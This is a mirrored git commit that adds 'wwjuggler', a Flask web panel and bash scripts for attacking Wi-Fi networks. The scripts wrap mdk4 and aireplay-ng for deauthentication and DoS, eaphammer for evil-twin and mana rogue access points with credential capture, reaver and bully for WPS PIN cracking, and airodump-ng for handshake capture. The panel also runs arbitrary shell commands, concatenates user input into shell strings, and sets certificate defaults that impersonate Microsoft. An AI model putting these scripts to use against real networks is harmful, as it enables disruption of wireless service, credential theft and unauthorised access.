github/PEASS-ng
1
Fork 0
mirror of https://github.com/carlospolop/PEASS-ng synced 2024-11-20 12:39:21 +01:00
Code Releases Activity

Winpeas: More checks & fixes

Browse Source
This commit is contained in:
carlospolop 2020-02-24 00:07:46 +00:00
parent 8477b159e2
commit c657598821
73 changed files with 28090 additions and 151 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
linPEAS/linpeas.sh Executable file → Normal file
View File

3
projects/wwjuggler/.vscode/settings.json vendored Normal file
View File

@ -0,0 +1,3 @@
{
"python.pythonPath": "/usr/bin/python3"
}

0
projects/wwjuggler/app/__init__.py Normal file
View File

BIN
projects/wwjuggler/app/__pycache__/__init__.cpython-37.pyc Normal file
View File

Binary file not shown.

BIN
projects/wwjuggler/app/__pycache__/app.cpython-37.pyc Normal file
View File

Binary file not shown.

BIN
projects/wwjuggler/app/__pycache__/forms.cpython-37.pyc Normal file
View File

Binary file not shown.

BIN
projects/wwjuggler/app/__pycache__/utils.cpython-37.pyc Normal file
View File

Binary file not shown.

358
projects/wwjuggler/app/app.py Normal file
View File

@ -0,0 +1,358 @@
from flask import Flask, render_template, flash, redirect, url_for, request
app = Flask(__name__)
from flask_httpauth import HTTPBasicAuth
from flask_bootstrap import Bootstrap
bootstrap = Bootstrap(app)
from werkzeug.security import generate_password_hash, check_password_hash
#from app import app
from app.forms import DoSForm, ClientForm, CreateCertForm, HandshakeCapture, ExecForm, WPSCracking
from app.utils import *
import os, glob, signal
from subprocess import Popen, PIPE
from time import sleep
app.config['SECRET_KEY'] = os.urandom(32)
auth = HTTPBasicAuth()
users = {
"hacker": generate_password_hash("wwjuggler"),
}
@auth.verify_password
def verify_password(username, password):
if username in users:
return check_password_hash(users.get(username), password)
return False
@auth.login_required
@app.route('/change_wlan_mode/<string:wiface>', methods=['GET'])
def change_wlan_mode(wiface):
wlans = get_wlan_interfaces()
print(wiface)
if wiface in wlans:
if wlans[wiface] == "Managed":
#p = Popen(("iwconfig '"+wiface+"' mode monitor").split(" "), stdout=PIPE, stderr=PIPE)
p = Popen(("airmon-ng start '"+wiface).split(" "), stdout=PIPE, stderr=PIPE)
else:
#p = Popen(("iwconfig '"+wiface+"' mode managed").split(" "), stdout=PIPE, stderr=PIPE)
p = Popen(("airmon-ng stop '"+wiface).split(" "), stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
if stdout:
flash(stdout.decode("utf-8"))
if stderr:
flash("STDERR: "+stderr.decode("utf-8"))
return render_template('index.html', wlans=get_wlan_interfaces())
@app.route('/')
@app.route('/index')
@auth.login_required
def index():
wlans = get_wlan_interfaces()
return render_template('index.html', wlans=wlans)
@auth.login_required
@app.route('/scan_results')
def scan_results():
stations,clients = get_scan_results()
return render_template('scan_results.html', aps=stations, clients=clients)
@auth.login_required
@app.route('/dos', methods=['GET', 'POST'])
def dos():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = DoSForm(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.essid1.choices = [(e, e) for e in essids]
form.bssid1.choices = [(b, b) for b in station_macs]
form.client1.choices = [(c, c) for c in clients_macs]
if form.validate_on_submit():
essid = form.essid2.data if form.essid2.data else ( form.essid1.data if form.essid1.data else "")
bssid = form.bssid2.data if form.bssid2.data else ( form.bssid1.data if form.bssid1.data else "")
client = form.client2.data if form.client2.data else ( form.client1.data if form.client1.data else "")
exec_msg = "Executing " + form.option.data + " in interface " + form.interface.data
cmd = scripts_path+"/DoS.sh -o "+ form.option.data + " -i " + form.interface.data
if essid:
exec_msg += ", against ESSID " + essid
cmd += " -e \"" + essid + "\""
if bssid:
exec_msg += ", against BSSID " + bssid
cmd += " -b " + bssid
if client:
exec_msg += ", against Client " + client
cmd += " -m " + client
if form.channel.data:
exec_msg += " in Channel " + str(form.channel.data)
cmd += " -c " + str(form.channel.data)
if form.fake_essids.data:
exec_msg += " anouncing fake ESSIDS ("+form.fake_essids.data+")"
cmd += " -f \"" + form.fake_essids.data + "\""
if form.time.data:
exec_msg += " during " + str(form.time.data) + "s"
cmd += " -t " + str(form.time.data)
else:
exec_msg += " indefinitely"
if form.stealth.data:
exec_msg += " and stealthy"
cmd += " -s"
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
my_execute(cmd, outfile, errfile, True)
return redirect(url_for('console'))
return render_template('form.html', formtype="DoS Attack", form=form)
@auth.login_required
@app.route('/client', methods=['GET', 'POST'])
def client():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = ClientForm(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.essid_whitelist.choices = [(e, e) for e in essids]
form.essid_blacklist.choices = [(e, e) for e in essids]
form.mac_whitelist.choices = [(c, c) for c in clients_macs]
form.mac_blacklist.choices = [(c, c) for c in clients_macs]
if form.validate_on_submit():
essid = form.essid2.data if form.essid2.data else ( form.essid1.data if form.essid1.data else "")
exec_msg = "Executing " + form.option.data + " in interface " + form.interface.data + " using as authentication "+form.auth.data
cmd = scripts_path+"/Client.sh -o "+ form.option.data + " -i " + form.interface.data + " -a " + form.auth.data
if form.wpa_version.data:
exec_msg += "(" + form.wpa_version.data +")"
cmd += " -w " + form.wpa_version.data
if essid:
exec_msg += ", as ESSID " + essid
cmd += " -e " + essid
if form.bssid.data:
exec_msg += ", as BSSID " + form.bssid.data
cmd += " -e " + essid
if form.channel.data:
exec_msg += " in Channel " + str(form.channel.data)
cmd += " -c " + str(form.channel.data)
if form.loud.data:
exec_msg += " (Loud mode)"
cmd += " -l"
if form.known_beacons.data:
exec_msg += " - Known Beacons declared"
cmd += " -k " + ",".join(form.known_beacons.data)
if form.mac_whitelist.data:
exec_msg += " - Mac Whitelist declared"
cmd += " -p " + ",".join(form.mac_whitelist.data)
if form.mac_blacklist.data:
exec_msg += " - Mac Blacklist declared"
cmd += " -v " + ",".join(form.mac_blacklist.data)
if form.essid_whitelist.data:
exec_msg += " - ESSID Whitelist declared"
cmd += " -n " + ",".join(form.essid_whitelist.data)
if form.essid_blacklist.data:
exec_msg += " - ESSID Blacklist declared"
cmd += " -m " + ",".join(form.essid_blacklist.data)
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
my_execute(cmd.split(" "), outfile, errfile)
return redirect(url_for('console'))
return render_template('form.html', formtype="Client Attack", form=form)
@auth.login_required
@app.route('/create_cert', methods=['GET', 'POST'])
def create_cert():
form = CreateCertForm(request.form)
if form.validate_on_submit():
exec_msg = "Creating certificate with CC: "+form.cc.data+", State:"+form.state.data+", City: "+form.city.data+", Organization: "+form.organization.data+", Department: "+form.department.data+", Email"+form.email.data+", CN:"+form.cn.data
cmd = scripts_path+"/Create_cert.sh '{}' '{}' '{}' '{}' '{}' '{}' '{}'".format(form.cc.data, form.state.data, form.city.data, form.organization.data, form.department.data, form.email.data, form.cn.data)
flash(exec_msg)
outfile = current_store_path+"/create_cert"+str(count_ps)+".out"
errfile = current_store_path+"/create_cert"+str(count_ps)+".err"
my_execute(cmd, outfile, errfile, True)
return redirect(url_for('console'))
return render_template('form.html', formtype="Create EAP Certificate", form=form)
@auth.login_required
@app.route('/wps_cracking', methods=['GET', 'POST'])
def wps_cracking():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = WPSCracking(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.bssid.choices = [(b, b) for b in station_macs]
if form.validate_on_submit():
exec_msg = "WPS cracking with option "+form.option.data+" against BSSID "+form.bssid.data+" in channel "+str(form.channel.data)
cmd = scripts_path+"/WPS.sh -t {} -i '{}' -b '{}' -c '{}' -o '{}'".format(form.tool.data, form.interface.data, form.bssid.data, form.channel.data, form.option.data)
if form.ignore_locks.data:
exec_msg += "(ignore LOCK)"
cmd += " -l"
if form.pin.data:
exec_msg += ", PIN: "+str(form.pin.data)
cmd += " -p "+str(form.pin.data)
if form.option.data == "nullpin":
cmd.replace("bully", "reaver")
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+str(count_ps)+".err"
my_execute(cmd, outfile, errfile, True)
return redirect(url_for('console'))
return render_template('form.html', formtype="WPS Cracking", form=form)
@auth.login_required
@app.route('/capture_handshake', methods=['GET', 'POST'])
def capture_handshake():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = HandshakeCapture(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.bssid.choices = [(b, b) for b in station_macs]
if form.validate_on_submit():
exec_msg = "Capturing handshakes using interface " + form.interface.data + " of bssid " + form.bssid.data + " in channel "+str(form.channel.data)
cmd = scripts_path+"/Capture_handshakes.sh " + form.interface.data + " " +str(form.channel.data) + " " + form.bssid.data + " " + current_store_path + "/psk"
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
my_execute(cmd.split(" "), outfile, errfile)
return redirect(url_for('console'))
return render_template('form.html', formtype="Capture Handshakes", form=form)
@auth.login_required
@app.route('/execute', methods=['GET', 'POST'])
def execute():
form = ExecForm()
if form.validate_on_submit():
exec_msg = "Going to execute: " + form.cmd.data
flash(exec_msg)
outfile = current_store_path+"/execute"+str(count_ps)+".out"
errfile = current_store_path+"/execute"+str(count_ps)+".err"
my_execute(form.cmd.data , outfile, errfile, True)
sleep(1)#So when you gets to console the command is probably executed already
return redirect(url_for('console'))
return render_template('form.html', formtype="Execute", form=form)
@auth.login_required
@app.route('/console')
def console():
procs = get_procs()
return render_template('console.html', procs=procs)
@auth.login_required
@app.route('/kill/<string:file_name>', methods=['GET'])
def kill(file_name):
global executing_procs
procs = get_procs()
if ".err" in file_name:
file_name=file_name.replace(".err",".out")
if file_name in executing_procs and any([p["terminated"] == "Running" for p in procs if p["name"] == file_name]): #Check that the process is still running
pid = executing_procs[file_name].pid
try:
if not "mana" in file_name and not "evil_twin" in file_name:
os.killpg(pid, signal.SIGTERM)
else:
executing_procs[file_name].communicate(input=b"\n")
sleep(4)
flash("Process terminated ("+file_name.split(".")[0]+") with PID "+str(pid)+".")
except Exception as e:
print(e)
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".out"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".out")
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".err"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".err")
return redirect(url_for('console'))
@auth.login_required
@app.route('/killall', methods=['GET'])
def killall():
global executing_procs
procs = get_procs()
for file_name in executing_procs:
if any([p["terminated"] == "Running" for p in procs if p["name"] == file_name]): #Check that the process is still running
pid = executing_procs[file_name].pid
try:
if not "mana" in file_name and not "evil_twin" in file_name:
os.killpg(pid, signal.SIGTERM)
else:
executing_procs[file_name].communicate(input=b"\n")
sleep(4)
flash("Process terminated ("+file_name.split(".")[0]+") with PID "+str(pid)+".")
except:
pass
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".out"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".out")
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".err"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".err")
executing_procs = {}
return redirect(url_for('console'))
@auth.login_required
@app.route('/restart_airodump', methods=['POST'])
def restart_airodump():
restart_airo()
return redirect(url_for('index'))
@auth.login_required
@app.route('/reboot', methods=['POST'])
def reboot():
os.system("reboot")
##################################################
################ INITIAL ACTIONS #################
##################################################
#clean_exec_procs_dir() #Start cleaning other executions
if not os.path.exists(store_path): #Create main dir if it doesn't exit (1st run)
os.mkdir(store_path)
if not os.path.exists(current_store_path): #Create main dir if it doesn't exit (1st run)
os.mkdir(current_store_path)
if not os.path.exists(store_airodump): #Create main dir if it doesn't exit (1st run)
os.mkdir(store_airodump)
sleep(0.5)
restart_airo() #"Restart" any airodump to capture packets

79
projects/wwjuggler/app/forms.py Normal file
View File

@ -0,0 +1,79 @@
from flask_wtf import FlaskForm
from wtforms import StringField, SelectField, IntegerField, BooleanField, SubmitField, PasswordField, TextAreaField, validators, SelectMultipleField
from wtforms.validators import DataRequired
class DoSForm(FlaskForm):
option = SelectField(u'DoS Attacks', choices=[('deauth_mdk4', 'MDK4 Deauth'), ('deauth_aireplay', 'Aireplay Deauth'), ('WIDS_confusion', 'WIDS Confusion'), ('fake_aps', 'Fake APs'), ('reinject_data', 'DoS AP reinjecting data'), ('EAPOL_DoS', 'EAPOL_DoS'), ('TKIP_DoS', 'TKIP_DoS')], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
essid1 = SelectField(u'ESSID1', choices=[], validators=(validators.Optional(),))
essid2 = StringField(u'ESSID2', validators=(validators.Optional(),))
bssid1 = SelectField(u'BSSID1', choices=[], validators=(validators.Optional(),))
bssid2 = StringField(u'BSSID2', [
validators.Optional(),
validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
validators.Length(min=17, max=17, message="BSSID must be 17 chars length: 45:D2:28:33:B7:2D")
])
client1 = SelectField(u'Client1', choices=[], validators=(validators.Optional(),))
client2 = StringField(u'Client2', [
validators.Optional(),
validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
validators.Length(min=17, max=17, message="Client MAC must be 17 chars length: 45:D2:28:33:B7:2D")
])
fake_essids = StringField(u'Fake essids', validators=(validators.Optional(),))
time = IntegerField(u'Time', validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=(validators.Optional(),))
stealth = BooleanField(u'Stealth')
submit = SubmitField(u'Attack')
class ClientForm(FlaskForm):
option = SelectField(u'Client Attack', choices=[('evil_twin', 'Evil Twin'), ('mana', 'Mana')], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
auth = SelectField(u'Auth method', choices=[("open","open"),("wpa-psk","wpa-psk"),("wpa-eap","wpa-eap"),("owe","owe"),("owe-transition","owe-transition"),("owe-psk","owe-psk")], validators=[DataRequired()])
essid1 = SelectField(u'ESSID1', choices=[], validators=(validators.Optional(),))
essid2 = StringField(u'ESSID2', validators=(validators.Optional(),))
bssid = StringField(u'BSSID', [
validators.Optional(),
validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
validators.Length(min=17, max=17, message="BSSID must be 17 chars length: 45:D2:28:33:B7:2D")
], default="74:D0:2B:90:56:F2")
wpa_version = SelectField(u'WPA version', choices=[("2","2"),("1","1")], validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=(validators.Optional(),))
loud = BooleanField(u'Loud')
known_beacons = StringField(u'Known Beacons', validators=(validators.Optional(),))
mac_whitelist = SelectMultipleField(u'Mac Whitelist', choices=[], validators=(validators.Optional(),))
mac_blacklist = SelectMultipleField(u'Mac Blacklist', choices=[], validators=(validators.Optional(),))
essid_whitelist = SelectMultipleField(u'ESSID Whitelist', choices=[], validators=(validators.Optional(),))
essid_blacklist = SelectMultipleField(u'ESSID Blacklist', choices=[], validators=(validators.Optional(),))
submit = SubmitField(u'Attack')
class CreateCertForm(FlaskForm):
cc = StringField(u'Please enter two letter country code for certs (i.e. US, FR)', default="US", validators=[DataRequired()])
state = StringField(u'Please enter state or province for certs (i.e. Ontario, New Jersey)', default="California", validators=[DataRequired()])
city = StringField(u'Please enter locale for certs (i.e. London, Hong Kong)', default="Los Angeles", validators=[DataRequired()])
organization = StringField(u'Please enter organization for certs (i.e. Evil Corp)', default="Microsoft", validators=[DataRequired()])
department = StringField(u'Please enter org unit for certs (i.e. Hooman Resource Says)', default="Human Resources", validators=[DataRequired()])
email = StringField(u'Please enter email for certs (i.e. cyberz@h4x0r.lulz)', default="humanresources@microsoft.com", validators=[DataRequired()])
cn = StringField(u'Please enter common name (CN) for certs.', default="microsoft.com", validators=[DataRequired()])
submit = SubmitField(u'Create')
class HandshakeCapture(FlaskForm):
option = SelectField(u'', choices=[("airodump","Airodump-ng")], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
bssid = SelectField(u'BSSID', choices=[], validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=[DataRequired()])
submit = SubmitField(u'Capture')
class ExecForm(FlaskForm):
cmd = StringField(u'Command line to execute', default="whoami", validators=[DataRequired()])
submit = SubmitField(u'Execute')
class WPSCracking(FlaskForm):
option = SelectField(u'Option', choices=[("custompin", "Custom PIN"), ("nullpin", "Null PIN"), ("pixiedust", "Pixiedust"), ("bruteforce_wps", "Brute-Force")], validators=[DataRequired()])
tool = SelectField(u'Tool', choices=[("reaver", "reaver"), ("bully", "bully")], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
bssid = SelectField(u'BSSID', choices=[], validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=[DataRequired()])
pin = IntegerField(u'Pin', validators=(validators.Optional(),))
ignore_locks = BooleanField(u'Ignore Locks', default=True)
submit = SubmitField(u'Crack')

5
projects/wwjuggler/app/scripts/Capture_handshakes.sh Executable file
View File

@ -0,0 +1,5 @@
#!/bin/bash
echo "Executing: airodump-ng $1 -c \"$2\" --bssid \"$3\" -w \"$4\""
airodump-ng "$1" -c "$2" --bssid "$3" -w "$4" --output-format pcap

107
projects/wwjuggler/app/scripts/Client.sh Executable file
View File

@ -0,0 +1,107 @@
#!/bin/bash
INTERFACE=""
ESSID=""
BSSID=""
AUTH=""
WPA_VERSION=""
KNOWN_BEACONS=""
MAC_WHITELIST=""
MAC_BLACKLIST=""
OPTION=""
LOUD=""
CHANNEL=""
while getopts "i:e:b:a:w:k:p:v:o:c:l" opt; do
case "$opt" in
i) INTERFACE=$OPTARG;;
e) ESSID=$OPTARG;;
b) BSSID=$OPTARG;;
a) AUTH=$OPTARG;;
w) WPA_VERSION=$OPTARG;;
k) KNOWN_BEACONS=$OPTARG;;
p) MAC_WHITELIST=$OPTARG;;
v) MAC_BLACKLIST=$OPTARG;;
o) OPTION=$OPTARG;;
c) CHANNEL=$OPTARG;;
l) LOUD="1";; #Used to no broadcast deauthentication packets, only useful with mdk4
esac
done
evil_twin(){
# REQUREMENTS: INTERFACE, ESSID and AUTH
CMD="eaphammer -i $INTERFACE --essid $ESSID --auth $AUTH"
if [ "$AUTH" = "open" ]; then
CMD="$CMD --captive-portal"
elif [ "$AUTH" = "wpa-psk" ] || [ "$AUTH" = "wpa-eap" ]; then
if [ "$WPA_VERSION" ]; then
CMD="$CMD --wpa-version $WPA_VERSION --creds"
fi
else
CMD="$CMD --creds"
fi
if [ "$CHANNEL" ]; then
CMD="$CMD --channel $CHANNEL"
fi
if [ "$MAC_WHITELIST" ]; then
TEMPFILEWHITE="/tmp/white$RANDOM"
echo "$MAC_WHITELIST" | sed "s/,/\n/g" > $TEMPFILEWHITE
CMD="$CMD ---mac-whitelist $TEMPFILEWHITE"
fi
if [ "$MAC_BLACKLIST" ]; then
TEMPFILEBLACK="/tmp/black$RANDOM"
echo "$TEMPFILEBLACK" | sed "s/,/\n/g" > $TEMPFILEBLACK
CMD="$CMD ---mac-blacklist $TEMPFILEWHITE"
fi
echo "Going to execute $CMD"
$CMD
}
mana(){
# REQUREMENTS: INTERFACE, ESSID and AUTH
CMD="eaphammer -i $INTERFACE --auth $AUTH --cloaking full --mana"
if [ "$AUTH" = "open" ]; then
CMD="$CMD --captive-portal"
else
CMD="$CMD --creds"
fi
if [ "$LOUD" ]; then
CMD="$CMD --loud"
fi
if [ "$MAC_WHITELIST" ]; then
TEMPFILEWHITE="/tmp/white$RANDOM"
echo "$MAC_WHITELIST" | sed "s/,/\n/g" > $TEMPFILEWHITE
CMD="$CMD ---mac-whitelist $TEMPFILEWHITE"
fi
if [ "$MAC_BLACKLIST" ]; then
TEMPFILEBLACK="/tmp/black$RANDOM"
echo "$TEMPFILEBLACK" | sed "s/,/\n/g" > $TEMPFILEBLACK
CMD="$CMD ---mac-blacklist $TEMPFILEWHITE"
fi
if [ "$KNOWN_BEACONS" ]; then
TEMPFILE="/tmp/beacons$RANDOM"
echo "$KNOWN_BEACONS" | sed "s/,/\n/g" > $TEMPFILE
CMD="$CMD --known-beacons --known-ssids-file $TEMPFILE"
fi
echo "Going to execute $CMD"
$CMD
}
if [ "$OPTION" == "evil_twin" ]; then
evil_twin
elif [ "$OPTION" == "mana" ]; then
mana
fi

5
projects/wwjuggler/app/scripts/Create_cert.sh Executable file
View File

@ -0,0 +1,5 @@
#!/bin/bash
echo "Executing: echo -e \"$1\n$2\n$3\n$4\n$5\n$6\n$7\" | eaphammer --cert-wizard interactive"
echo -e "$1\n$2\n$3\n$4\n$5\n$6\n$7" | eaphammer --cert-wizard interactive

209
projects/wwjuggler/app/scripts/DoS.sh Executable file
View File

@ -0,0 +1,209 @@
#!/bin/bash
INTERFACE=""
ESSID=""
BSSID=""
MAC_CLIENT=""
TIME=""
OPTION=""
CHANNEL=""
STEALTH=""
FAKE_ESSIDS=""
while getopts "i:e:b:m:c:t:o:f:s" opt; do
case "$opt" in
i) INTERFACE=$OPTARG;;
e) ESSID=$OPTARG;;
b) BSSID=$OPTARG;;
m) MAC_CLIENT=$OPTARG;;
c) CHANNEL=$OPTARG;;
t) TIME=$OPTARG;;
o) OPTION=$OPTARG;;
f) FAKE_ESSIDS=$OPTARG;;
s) STEALTH="1";; #Used to no broadcast deauthentication packets, only useful with mdk4
esac
done
deauth_aireplay(){
# REQUREMENTS: INTERFACE and (ESSID or BSSID)
# Working mode:
# Cannot perform hole automatic deauth of everything found
# If only ESSID is given, broadcast desauth will be launch to the found BSSID using the given ESSID
# If only the BSSID is given, broadcast desauth is launched
# In this case Stealth flag doesn't do nothing as aireplay do not support it
CMD="aireplay-ng -0 0"
if [ "$ESSID" ]; then
CMD="$CMD -e $ESSID"
fi
if [ "$BSSID" ]; then
CMD="$CMD -a $BSSID"
fi
if [ "$MAC_CLIENT" ]; then
CMD="$CMD -c $MAC_CLIENT"
fi
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
CMD="$CMD $INTERFACE"
echo Going to execute $CMD
$CMD
}
deauth_mdk4(){
# REQUREMENTS: INTERFACE
# Working mode:
# Can perform hole automatic deauth of everything found
# If Stealth is used, no broadcast packet is sent
CMD="mdk4 $INTERFACE d"
if [ "$ESSID" ]; then
CMD="$CMD -E $ESSID"
fi
if [ "$BSSID" ]; then
CMD="$CMD -B $BSSID"
fi
if [ "$MAC_CLIENT" ]; then
TEMPFILE="/tmp/victim$RANDOM"
echo "$MAC_CLIENT" > $TEMPFILE
CMD="$CMD -b $TEMPFILE"
fi
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$CHANNEL" ]; then
CMD="$CMD -c $CHANNEL"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -x"
fi
echo "Going to execute $CMD"
$CMD
}
fake_aps(){
# REQUREMENTS: INTERFACE
# Working mode:
# Will send fake beacons of APs, if stealth mode is used, nonprintable chars and long names will be sent.
CMD="mdk4 $INTERFACE b -w nwta -m"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$CHANNEL" ]; then
CMD="$CMD -h -c $CHANNEL"
fi
if [ "$FAKE_ESSIDS" ]; then
TEMPFILE="/tmp/essids$RANDOM"
echo "$FAKE_ESSIDS" | sed "s/,/\n/g" > $TEMPFILE
CMD="$CMD -f $TEMPFILE"
else
if ! [ "$STEALTH" ]; then
CMD="$CMD -a"
fi
fi
echo "Going to execute $CMD"
$CMD
}
reinject_data(){
# REQUREMENTS: INTERFACE and BSSID
# Working mode: (Stealth and not stealth could be combined)
# If stealth, capture and repeat packets from authenticated clients, else send random data from random clients.
CMD="mdk4 $INTERFACE a -m"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -i $BSSID"
else
CMD="$CMD -a $BSSID"
fi
echo "Going to execute $CMD"
$CMD
}
TKIP_DoS(){
# REQUREMENTS: INTERFACE and a WPA/TKIP AP
# Working mode: (Stealth and not stealth could be combined)
# If stealth, use intelligent replay
CMD="mdk4 $INTERFACE m"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$BSSID" ]; then
CMD="$CMD -t $BSSID"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -j"
fi
echo "Going to execute $CMD"
$CMD
}
EAPOL_DoS(){
# REQUREMENTS: INTERFACE and a EAP AP
# Working mode: (Stealth and not stealth could be combined)
# If stealth, use Logoff messages to kick clients
CMD="mdk4 $INTERFACE e"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$BSSID" ]; then
CMD="$CMD -t $BSSID"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -l"
fi
echo "Going to execute $CMD"
$CMD
}
WIDS_confusion(){
# REQUREMENTS: INTERFACE and BSSID/ESSID
# Working mode: (Stealth and not stealth could be combined)
# If no stealth, activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
CMD="mdk4 $INTERFACE w"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$BSSID" ]; then
CMD="$CMD -e $BSSID"
elif [ "$ESSID" ]; then
CMD="$CMD -e $ESSID"
fi
if ! [ "$STEALTH" ]; then
CMD="$CMD -z"
fi
echo "Going to execute $CMD"
$CMD
}
if [ "$OPTION" == "deauth_aireplay" ]; then
deauth_aireplay
elif [ "$OPTION" == "deauth_mdk4" ]; then
deauth_mdk4
elif [ "$OPTION" == "fake_aps" ]; then
fake_aps
elif [ "$OPTION" == "reinject_data" ]; then
reinject_data
elif [ "$OPTION" == "TKIP_DoS" ]; then
TKIP_DoS
elif [ "$OPTION" == "EAPOL_DoS" ]; then
EAPOL_DoS
elif [ "$OPTION" == "WIDS_confusion" ]; then
WIDS_confusion
fi

70
projects/wwjuggler/app/scripts/WPS.sh Executable file
View File

@ -0,0 +1,70 @@
#!/bin/bash
INTERFACE=""
OPTION=""
TOOL=""
BSSID=""
CHANNEL=""
PIN=""
IGNORE_LOCKS="1"
while getopts "i:o:t:b:c:p:l" opt; do
case "$opt" in
i) INTERFACE=$OPTARG;;
o) OPTION=$OPTARG;;
t) TOOL=$OPTARG;;
b) BSSID=$OPTARG;;
c) CHANNEL=$OPTARG;;
p) PIN=$OPTARG;;
l) IGNORE_LOCKS="";;
esac
done
wps_force(){
# REQUREMENTS: INTERFACE, ESSID and AUTH
if [ $TOOL = "reaver" ]; then
CMD="reaver -i $INTERFACE -b $BSSID -c $CHANNEL"
case $OPTION in
"custompin")
CMD="$CMD -f -N -g 1 -d 2 -vv -p '$PIN'"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
"nullpin")
CMD="$CMD -f -N -g 1 -d 2 -vv -p ''"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
"pixiedust")
CMD="$CMD -K 1 -Z -N -vv"
;;
"bruteforce")
CMD="$CMD -f -N -vv"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L -d 2"; fi
;;
esac
elif [ $TOOL = "bully" ]; then
CMD="bully $INTERFACE -b $BSSID -c $CHANNEL"
case $OPTION in
"custompin")
CMD="$CMD -F -B -v 3 -p '$PIN'"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
"pixiedust")
CMD="$CMD -d -v 3"
;;
"bruteforce_wps")
CMD="$CMD -S -F -B -v 3"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
esac
fi
echo "Going to execute: echo \"n\" | $CMD"
echo "n" | $CMD
}
wps_force

6
projects/wwjuggler/app/static/bootstrap.min.css vendored Normal file
View File

File diff suppressed because one or more lines are too long

1
projects/wwjuggler/app/static/bootstrap.min.css.map Normal file
View File

File diff suppressed because one or more lines are too long

262
projects/wwjuggler/app/static/form.js Normal file
View File

@ -0,0 +1,262 @@
file:///root/projects/wwjuggler/app/static/form_options.js {"mtime":1578310037779,"ctime":1578075190140,"size":9552,"etag":"34ebpirra9t4","orphaned":false}
$("#option").on("change", function(){
hide_fields()
});
function hide_fields() {
$('#option_msg').html(options_msgs[$("#option").val()]);
switch($("#option").val()) {
case "deauth_aireplay":
show_essid()
show_bssid()
show_client()
hide_fake_essids()
hide_stealth()
hide_channel()
break;
case "deauth_mdk4":
show_essid()
show_bssid()
show_client()
show_stealth()
show_channel()
hide_fake_essids()
break;
case "WIDS_confusion":
show_essid()
show_bssid()
show_stealth()
hide_client()
hide_fake_essids()
hide_channel()
break;
case "fake_aps":
show_channel()
show_stealth()
show_fake_essids()
hide_bssid()
hide_client()
hide_essid()
break;
case "reinject_data":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "EAPOL_DoS":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
